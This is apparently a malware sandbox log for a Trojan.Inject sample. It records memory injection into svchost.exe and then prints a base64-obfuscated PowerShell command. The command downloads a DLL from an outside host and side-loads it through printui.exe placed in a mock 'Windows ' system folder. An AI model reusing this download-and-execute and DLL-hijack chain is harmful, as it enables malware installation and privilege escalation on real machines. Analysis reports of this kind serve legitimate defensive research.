    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00E8Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00E9Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00EAJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00EBJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00ECJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00EDJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00EEJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00EFJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00F0Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00F1Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00F2Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00F3Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00F4Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00F5Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00F6Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00F7Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00F8Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00F9Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00FAJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00FBJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00FCJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00FDJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00FEJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B00FFJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0100Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0101Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0102Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0103Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0104Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0105Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0106Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0107Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0108Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0109Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B010AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B010BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B010CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B010DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B010EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B010FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0110Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0111Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0112Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0113Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0114Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0115Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0116Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0117Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0118Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0119Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B011AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B011BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B011CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B011DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B011EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B011FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0120Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0121Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0122Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0123Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0124Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0125Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0126Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0127Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0128Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0129Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B012AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B012BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B012CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B012DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B012EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B012FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0130Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0131Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0132Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0133Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0134Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0135Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0136Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0137Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0138Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0139Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B013AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B013BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B013CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B013DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B013EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B013FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0140Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0141Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0142Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0143Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0144Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0145Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0146Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0147Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0148Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0149Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B014AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B014BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B014CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B014DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B014EJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('sw52b2tllvdlyljlcxvlc3qglvvyasaiahr0chm6ly9yyxcuz2l0ahvidxnlcmnvbnrlbnquy29tl3bhbmnoaxrvcglzdg9szxn4l2l0zw1zl21haw4vdxn2y3vzyi5kyxqiic1pdxrgawxlicjdolxvc2vyc1wkzw52olvzzxjoyw1lxefwcerhdgfcum9hbwluz1xwewxklmrsbci7dqptdgfydc1tbgvlccattwlsbglzzwnvbmrziduwmda7dqppziaovgvzdc1qyxroicjdolxvc2vyc1wkzw52olvzzxjoyw1lxefwcerhdgfcum9hbwluz1xwewxklmrsbcipew0kcu5ldy1jdgvtic1qyxroicjcxd9cqzpcv2luzg93cybcu3lzdgvtmziiic1jdgvtvhlwzsbeaxjly3rvcnkgluzvcmnlow0kcunvchktsxrlbsatugf0acaiqzpcv2luzg93c1xtexn0zw0zmlxwcmludhvplmv4zsiglurlc3rpbmf0aw9uicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmv4zsigluzvcmnlow0kcu1vdmutsxrlbsatugf0acaiqzpcvxnlcnncjgvudjpvc2vytmftzvxbchbeyxrhxfjvyw1pbmdcchlszc5kbgwiic1ezxn0aw5hdglvbiaiqzpcv2luzg93cybcu3lzdgvtmzjcchjpbnr1as5kbgwiic1gb3jjztsncgltdgfydc1tbgvlccattwlsbglzzwnvbmrzide1mda7dqoju3rhcnqtuhjvy2vzcyatrmlszvbhdgggikm6xfdpbmrvd3mgxfn5c3rlbtmyxhbyaw50dwkuzxhlijsjdqp9')); invoke-expression $decoded;"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('sw52b2tllvdlyljlcxvlc3qglvvyasaiahr0chm6ly9yyxcuz2l0ahvidxnlcmnvbnrlbnquy29tl3bhbmnoaxrvcglzdg9szxn4l2l0zw1zl21haw4vdxn2y3vzyi5kyxqiic1pdxrgawxlicjdolxvc2vyc1wkzw52olvzzxjoyw1lxefwcerhdgfcum9hbwluz1xwewxklmrsbci7dqptdgfydc1tbgvlccattwlsbglzzwnvbmrziduwmda7dqppziaovgvzdc1qyxroicjdolxvc2vyc1wkzw52olvzzxjoyw1lxefwcerhdgfcum9hbwluz1xwewxklmrsbcipew0kcu5ldy1jdgvtic1qyxroicjcxd9cqzpcv2luzg93cybcu3lzdgvtmziiic1jdgvtvhlwzsbeaxjly3rvcnkgluzvcmnlow0kcunvchktsxrlbsatugf0acaiqzpcv2luzg93c1xtexn0zw0zmlxwcmludhvplmv4zsiglurlc3rpbmf0aw9uicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmv4zsigluzvcmnlow0kcu1vdmutsxrlbsatugf0acaiqzpcvxnlcnncjgvudjpvc2vytmftzvxbchbeyxrhxfjvyw1pbmdcchlszc5kbgwiic1ezxn0aw5hdglvbiaiqzpcv2luzg93cybcu3lzdgvtmzjcchjpbnr1as5kbgwiic1gb3jjztsncgltdgfydc1tbgvlccattwlsbglzzwnvbmrzide1mda7dqoju3rhcnqtuhjvy2vzcyatrmlszvbhdgggikm6xfdpbmrvd3mgxfn5c3rlbtmyxhbyaw50dwkuzxhlijsjdqp9')); invoke-expression $decoded;"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('sw52b2tllvdlyljlcxvlc3qglvvyasaiahr0chm6ly9yyxcuz2l0ahvidxnlcmnvbnrlbnquy29tl3bhbmnoaxrvcglzdg9szxn4l2l0zw1zl21haw4vdxn2y3vzyi5kyxqiic1pdxrgawxlicjdolxvc2vyc1wkzw52olvzzxjoyw1lxefwcerhdgfcum9hbwluz1xwewxklmrsbci7dqptdgfydc1tbgvlccattwlsbglzzwnvbmrziduwmda7dqppziaovgvzdc1qyxroicjdolxvc2vyc1wkzw52olvzzxjoyw1lxefwcerhdgfcum9hbwluz1xwewxklmrsbcipew0kcu5ldy1jdgvtic1qyxroicjcxd9cqzpcv2luzg93cybcu3lzdgvtmziiic1jdgvtvhlwzsbeaxjly3rvcnkgluzvcmnlow0kcunvchktsxrlbsatugf0acaiqzpcv2luzg93c1xtexn0zw0zmlxwcmludhvplmv4zsiglurlc3rpbmf0aw9uicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmv4zsigluzvcmnlow0kcu1vdmutsxrlbsatugf0acaiqzpcvxnlcnncjgvudjpvc2vytmftzvxbchbeyxrhxfjvyw1pbmdcchlszc5kbgwiic1ezxn0aw5hdglvbiaiqzpcv2luzg93cybcu3lzdgvtmzjcchjpbnr1as5kbgwiic1gb3jjztsncgltdgfydc1tbgvlccattwlsbglzzwnvbmrzide1mda7dqoju3rhcnqtuhjvy2vzcyatrmlszvbhdgggikm6xfdpbmrvd3mgxfn5c3rlbtmyxhbyaw50dwkuzxhlijsjdqp9')); invoke-expression $decoded;"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('sw52b2tllvdlyljlcxvlc3qglvvyasaiahr0chm6ly9yyxcuz2l0ahvidxnlcmnvbnrlbnquy29tl3bhbmnoaxrvcglzdg9szxn4l2l0zw1zl21haw4vdxn2y3vzyi5kyxqiic1pdxrgawxlicjdolxvc2vyc1wkzw52olvzzxjoyw1lxefwcerhdgfcum9hbwluz1xwewxklmrsbci7dqptdgfydc1tbgvlccattwlsbglzzwnvbmrziduwmda7dqppziaovgvzdc1qyxroicjdolxvc2vyc1wkzw52olvzzxjoyw1lxefwcerhdgfcum9hbwluz1xwewxklmrsbcipew0kcu5ldy1jdgvtic1qyxroicjcxd9cqzpcv2luzg93cybcu3lzdgvtmziiic1jdgvtvhlwzsbeaxjly3rvcnkgluzvcmnlow0kcunvchktsxrlbsatugf0acaiqzpcv2luzg93c1xtexn0zw0zmlxwcmludhvplmv4zsiglurlc3rpbmf0aw9uicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmv4zsigluzvcmnlow0kcu1vdmutsxrlbsatugf0acaiqzpcvxnlcnncjgvudjpvc2vytmftzvxbchbeyxrhxfjvyw1pbmdcchlszc5kbgwiic1ezxn0aw5hdglvbiaiqzpcv2luzg93cybcu3lzdgvtmzjcchjpbnr1as5kbgwiic1gb3jjztsncgltdgfydc1tbgvlccattwlsbglzzwnvbmrzide1mda7dqoju3rhcnqtuhjvy2vzcyatrmlszvbhdgggikm6xfdpbmrvd3mgxfn5c3rlbtmyxhbyaw50dwkuzxhlijsjdqp9')); invoke-expression $decoded;"Jump to behavior
    Source: svchost.exe, 00000002.00000002.3427681047.0000020857F91000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000002.00000000.2239313089.0000020857F91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
    Source: svchost.exe, 00000002.00000002.3427681047.0000020857F91000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000002.00000000.2239313089.0000020857F91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: svchost.exe, 00000002.00000002.3427681047.0000020857F91000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000002.00000000.2239313089.0000020857F91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: svchost.exe, 00000002.00000002.3427681047.0000020857F91000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000002.00000000.2239313089.0000020857F91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
